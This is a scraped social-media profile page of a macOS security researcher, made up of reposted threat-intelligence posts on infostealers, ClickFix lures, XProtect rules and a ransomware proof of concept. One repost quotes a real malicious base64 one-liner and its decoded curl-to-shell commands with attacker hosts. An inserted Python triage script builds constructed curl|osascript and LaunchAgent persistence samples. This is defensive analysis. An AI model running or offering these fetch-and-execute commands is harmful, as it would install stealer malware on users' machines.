Stuart Ashenbrenner 🇺🇸 🇨🇦 (@stuartjash)

7.2K posts

Principal macOS Security Researcher at @HuntressLabs | Creator of @Crash_Security | Reviewer at @bestthrillbooks | @MillennialGirlDad on @SubstackInc | 🏀

Portland, OR · Joined March 2016
1.4K Following · 1.6K Followers

Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Thomas Reed (@thomasareed)
I've exited from tech and am doing guided tours in and around Yellowstone. backroadsbear.com Thanks to everyone for some great years! This will be my last post here. 🐬
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Renzon (@r3nzsec)
DFIR analysts who use macOS as their daily driver deserve free and native forensic tooling. So I built one. 🍎

Introducing 𝗜𝗥𝗙𝗹𝗼𝘄 𝗧𝗶𝗺𝗲𝗹𝗶𝗻𝗲 — a timeline analysis app built from the ground up for Mac-based DFIR folks, forensic investigators, or SOC analysts. Built in appreciation of, and inspired by, Eric Zimmerman’s Timeline Explorer.

Every feature in this tool was shaped by real IR casework: handling massive timelines, parsing artifacts here and there, and pivoting across logs during active investigations. I built IRFlow Timeline to be the native macOS timeline analyzer that actually keeps up with a live case. Every button and view is intentional; if it’s in the app, it’s because I needed it mid-case and realized the standard tools fell short.

No dependencies. Zero setup. Just drag, drop, and analyze.

#dfir #incidentresponse #timeline #macos #threathunting #digitalforensics
Stuart Ashenbrenner 🇺🇸 🇨🇦
Apple dropping some XProtect updates (v5331) which seem to be every couple of Tuesdays. The new yara rules which look at some AMOS stealers are really interesting in that they're looking at the assembly instructions and the script-based stuff continues to move into XPScripts.yr.
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Who said what? (@g0njxa)
Hunting for macOS malware 🍎 with @osint_barbie revealed how threat actors are now leveraging different malware solutions at the same time on the same payload, in this case MacSync Stealer + Phexia Botnet for persistence.

Malicious @evernote results with fake installation guides are being sponsored on Google for common searches like homebrew, leading the user to copy, paste and run a malicious command (image 1):
lite.evernote[.]com/note/c548d6e8-22e3-d45c-b0d2-2ac5ecbd8964

Like usual, the payload is base64 encoded:
echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlIHBsZWFzZSB3YWl0Li4uJzsgY3VybCAta2ZzU0wgaHR0cDovL29udGFyaW9xdWFsaXR5Y2VkYXIuY29tL2N1cmwvYTBlZDBiZjg4MTY0YjA5NTYwZjM1ODQ2MjI3MWM2YTZlNzFkMjYxMWRiNjNkODVlYmFhZTkwYjI0OWJlOWYyOCB8IHpzaDsgY3VybCAta2ZzU0wgaHR0cDovLzEzOC4xMjQuMTguOS92IHwgYmFzaA==' | base64 -D | zsh

Decoded:
curl -kfsSL http://ontarioqualitycedar[.]com/curl/a0ed0bf88164b09560f358462271c6a6e71d2611db63d85ebaae90b249be9f28 | zsh; curl -kfsSL http://138.124.18.9/v

and we can already observe the two different malware solutions being leveraged.

1. MacSync Stealer
As usual, the URL http://ontarioqualitycedar[.]com/curl/a0ed0bf88164b09560f358462271c6a6e71d2611db63d85ebaae90b249be9f28 will provide a bash script with b64 + gunzip encoding, in charge of fetching the infostealer AppleScript, executing it and uploading the victim log to C2 (image 2). There is not really much newer on this than what was seen before, just that the MacSync script now uploads the log by splitting the file into 10 MB chunks, probably to avoid data losses in big logs.
MacSync bash script -> f5a3fcc5f5d4754d7262f55ac0a4519af15f93bba847e986a1660820bad1caef

2. Phexia Botnet
The interesting part of this post is that a second payload is being executed sequentially as part of a different malware solution to create persistence on the infected macOS machine. From C2 138.124.18.9/v, a b64-encoded AppleScript is fetched. In this case, it creates LaunchAgent persistence using a plist in ~/Library/LaunchAgents/com.bashsrc.ixxjeiijvivzovon.plist with b64 AppleScript content. This second payload, nothing far from what has been seen before, is responsible for fetching a live Phexia Botnet C2 from t[.]me/phefuckxiabot or, if that fails, hardcoded values (kys[.]cx and kys[.]li), then grabbing and executing the Phexia Botnet AppleScript, which grabs specs from the machine and waits until a task is loaded to be executed on the infected machine (image 3).
Phexia AppleScript -> 618bff4f4d090ff802d8009dc97a89723757bd179e5cab069fb33c5ec7de61c2

Sponsored results are being paid for by different, likely compromised, advertisers (image 4). Transparency users: AR01249564419160014849, AR13446608053252128769, AR06288543453827563521, AR03671228110637891585

By analysing the advertisers, you can already see other active ads sponsoring other malicious Evernote results for macOS applications or fake command solutions for Transmission, OnyX, Rectangle, Final Cut Pro, PearCleaner, DropOver, 7zip, Flush DNS, NFTS, AppCleaner, OBS, CrossOver, Unarchiver, Open Source Office, Microsoft Office or VLC Player, among others.
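The chain described in the post above (a base64 blob piped to `base64 -D | zsh`, a stage script wrapped in b64 + gunzip, and a LaunchAgent whose argument is itself a base64 command) is a pattern worth having a decoder for, and the same shape shows up in the other ClickFix posts on this page. The Python below is an added example written for this page, not code from the post or its author: it peels base64 and gzip layers until nothing more decodes, then lists the URLs each layer would curl and any LaunchAgent plist it writes, defanged for reporting. The samples it runs on are constructed here with reserved/invalid names (`loader.example.invalid`, `203.0.113.9`, `stage.example.invalid`, `c2.example.invalid`) and an invented plist label `com.example.agent`; none of them are the post's IOCs.

```python
"""Triage helper for ClickFix-style macOS one-liners (added example, not from the post)."""
import base64
import binascii
import gzip
import re

URL_RE = re.compile(r"https?://[^\s'\"|;<>]+")          # what a curl stage would fetch
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")        # long base64-alphabet runs
PLIST_RE = re.compile(r"~?/?Library/LaunchAgents/[\w.\-]+\.plist")


def defang(url: str) -> str:
    """hxxp://host[.]tld/path so IOCs pasted into a report are not clickable."""
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + sep + host.replace(".", "[.]") + slash + path


def decode_layer(token: str):
    """Decode one base64 token, gunzipping if it is a gzip stream; None if not text."""
    try:
        raw = base64.b64decode(token, validate=True)
        if raw[:2] == b"\x1f\x8b":          # gzip magic: the 'b64 + gunzip' stage
            raw = gzip.decompress(raw)
        text = raw.decode("utf-8")
    except (binascii.Error, OSError, EOFError, UnicodeDecodeError):
        return None
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None                          # random bytes (e.g. a hex hash that happened to decode)
    return text


def peel(blob: str, max_layers: int = 8) -> list[str]:
    """Return the script and every embedded layer it decodes to, breadth-first."""
    layers, queue, seen = [], [blob], set()
    while queue and len(layers) < max_layers:
        cur = queue.pop(0)
        layers.append(cur)
        for m in B64_RE.finditer(cur):
            token = m.group(0)
            if token in seen:
                continue
            seen.add(token)
            text = decode_layer(token)
            if text is not None:
                queue.append(text)
    return layers


def triage(blob: str) -> dict:
    """Defanged URLs and LaunchAgent plists across all layers, in order of appearance."""
    layers = peel(blob)
    urls, plists = [], []
    for layer in layers:
        for u in URL_RE.findall(layer):
            if defang(u) not in urls:
                urls.append(defang(u))
        for p in PLIST_RE.findall(layer):
            if p not in plists:
                plists.append(p)
    return {"layers": len(layers), "urls": urls, "plists": plists}


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed stage 1 (not a real IOC): what the victim is told to paste into Terminal.
STAGE1_CMD = ("echo 'Installing package please wait...'; "
              "curl -kfsSL http://loader.example.invalid/curl/abcd1234 | zsh; "
              "curl -kfsSL http://203.0.113.9/v | bash")
ONE_LINER = f"echo '{_b64(STAGE1_CMD)}' | base64 -D | zsh"   # -D on macOS, -d on Linux

# Constructed stage 2: a b64 + gzip wrapped script that fetches an AppleScript and drops a
# LaunchAgent whose argument is itself a base64 one-liner (assumed label com.example.agent).
AGENT_CMD = "curl -kfsSL http://c2.example.invalid/task | osascript"
STAGE2_SCRIPT = f"""#!/bin/bash
curl -kfsSL http://stage.example.invalid/stealer.scpt | osascript
cat > ~/Library/LaunchAgents/com.example.agent.plist <<EOF
<plist version="1.0"><dict>
<key>Label</key><string>com.example.agent</string>
<key>ProgramArguments</key><array>
<string>/bin/zsh</string><string>-c</string>
<string>echo {_b64(AGENT_CMD)} | base64 -d | zsh</string>
</array>
<key>RunAtLoad</key><true/>
</dict></plist>
EOF
launchctl load ~/Library/LaunchAgents/com.example.agent.plist
"""
STAGE2_WRAPPED = (f"echo {base64.b64encode(gzip.compress(STAGE2_SCRIPT.encode())).decode()}"
                  " | base64 -d | gunzip | bash")

if __name__ == "__main__":
    for name, blob in (("stage1", ONE_LINER), ("stage2", STAGE2_WRAPPED)):
        print(name, triage(blob))
```

Running the file prints the triage of both constructed samples. Feeding the post's own `echo '…' | base64 -D | zsh` line to `triage()` should yield the two stage URLs shown above; on a live case, also feed it the body of each fetched stage, since that is where the b64 + gunzip wrapper and the plist drop live. The printable-text check is what keeps a 64-character hex hash in a URL path (valid base64 alphabet, decodes to junk) from being reported as a layer.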
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Moonlock Lab (@moonlock_lab)
1/ We’re tracking a fresh wave of #Odyssey #Stealer activity targeting #macOS users. Over the past days, our telemetry showed newly updated samples spreading primarily across: 🇺🇸 United States 🇫🇷 France 🇪🇸 Spain Today, the picture has clearly changed: the same Odyssey campaign is now affecting users in additional regions, including: 🇬🇧 United Kingdom 🇩🇪 Germany 🇮🇹 Italy 🇨🇦 Canada 🇧🇷 Brazil 🇮🇳 India 🌏Multiple countries across Africa and Asia Two map screenshots, taken only one day apart, highlight a rapidly expanding geographic footprint. Odyssey stealer samples in this campaign appear to be auto-generated, producing many unique hashes with the same size and functionality. See IOCs in the next one below👇
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
L0Psec (@L0Psec)
This is an important update to osascript detection on macOS. As @howardnoakley stated, 12 rules were added including one for compiled osascript. These rules appear to provide coverage for many of the common infostealers we see targeting macOS. Let's take a look at a couple🧵
Quoted post from Howard Oakley, Eclectic Light Co (@howardnoakley): Apple has released an update to XProtect for all macOS eclecticlight.co/2026/02/03/app… via @howardnoakley
Moonlock Lab (@moonlock_lab)
@malwrhunterteam An interesting one, thanks for sharing here! According to internals, looks like Odyssey stealer.
MalwareHunterTeam (@malwrhunterteam)
"Neuravision.dmg": ea6f39158671ff940a94c433c354e7d27b885ca2d57ce205f87e47f17f934055 🤷‍♂️
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Moonlock Lab (@moonlock_lab)
1/ After Mosyle shared details of the macOS malware campaign dubbed #SimpleStealth (reported by @arinwaichulis 9to5mac.com/2026/01/09/mos…), spreading via a fake @grok app, we took a closer look at the sample and found it attempting to terminate macOS security and monitoring tools🧵
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Thijs Xhaflaire (@txhaflaire)
Are you using Visual Studio Code? Then this new blog from Jamf Threat Labs might have some takeaways for you! In this blog, we’ll shed light on newer techniques being used by DPRK-linked threat actors related to Contagious Interview, including a newly observed backdoor component. jamf.com/blog/threat-ac… #malware #git #macos #ThreatHunting #jamf
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Jonny Johnson (@JonnyJohnson_)
@stuartjash, Chris Ryan, and I have the incredible opportunity/privilege of helping build the @HuntressLabs EDR products. Although we all work on a different OS for these products, one thing we try to drive for our customers is parity. That comes with a handful of challenges, as one might imagine. Today, the 3 of us are dropping a blog that goes over the desire to chase parity across these products. Blog: huntress.com/blog/pursuing-… Note: Expect to see more blogs like this this year. We are driving some really cool features that can replicate across different operating systems.
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Objective-See Foundation (@objective_see)
🎉 A decade of Mac malware research 🎉 Just published our 10th annual “The Mac Malware of <year>” report ...2025 edition! For each new sample of 2025, covers: 🔎 IoCs 💉 Infection 💾 Persistence 📡 Capabilities ☣️ Samples for download Dive in 👇 objective-see.org/blog/blog_0x84…
Stuart Ashenbrenner 🇺🇸 🇨🇦
I have a copy of THE ART OF MAC MALWARE books to giveaway! If you'd like a copy, please just reply to this that you're interested and I will pick randomly. The only requirement is that you follow @patrickwardle, @objective_see, and are interested in Mac malware.
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Thijs Xhaflaire (@txhaflaire)
Related to my previous post, some newly found Clickfix sites that try to lure victims into running malicious bash one-liner commands. Seems they slightly updated their approach on these fake GitHub pages to mask the curl command. Also found some Windows variants, have not seen those earlier myself. Seems to fake that a download for a piece of software is being dynamically compiled. IOCs below #macos #malware #clickfix #infostealer
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Ryan Dowd (@_rdowd)
Updated my ransomware poc to remove the reboot requirement. Full TCC bypass for Tahoe 26.2 chained with a DoS exploit to demo exfiltration of private data and wipe the user's home directory while the user session remains active.
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Huntress (@HuntressLabs)
Search: “clear disk space on macOS” Click: legit ChatGPT convo Paste: “safe” Terminal command Boom: AMOS infostealer installed. @stuartjash & @JSemonSecurity break down how attackers are hijacking ChatGPT + Grok to deliver malware. huntress.com/blog/amos-stea…
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Ryan Dowd (@_rdowd)
I've been seeing a lot of discussion online recently about the changes to Apple's bug bounty program, specifically the downgrading of payouts for TCC bypass vulnerabilities. I was recently asked for my thoughts on this matter. I figured the best way to illustrate the importance of supporting research into this class of bug was to demonstrate the real-world impact. I created a small ransomware POC with clickfix-esque deployment (since that's what the cool kids are doing nowadays). No TCC prompts or any other system warnings. It exfils all sensitive user data and deletes the user's home and iCloud data.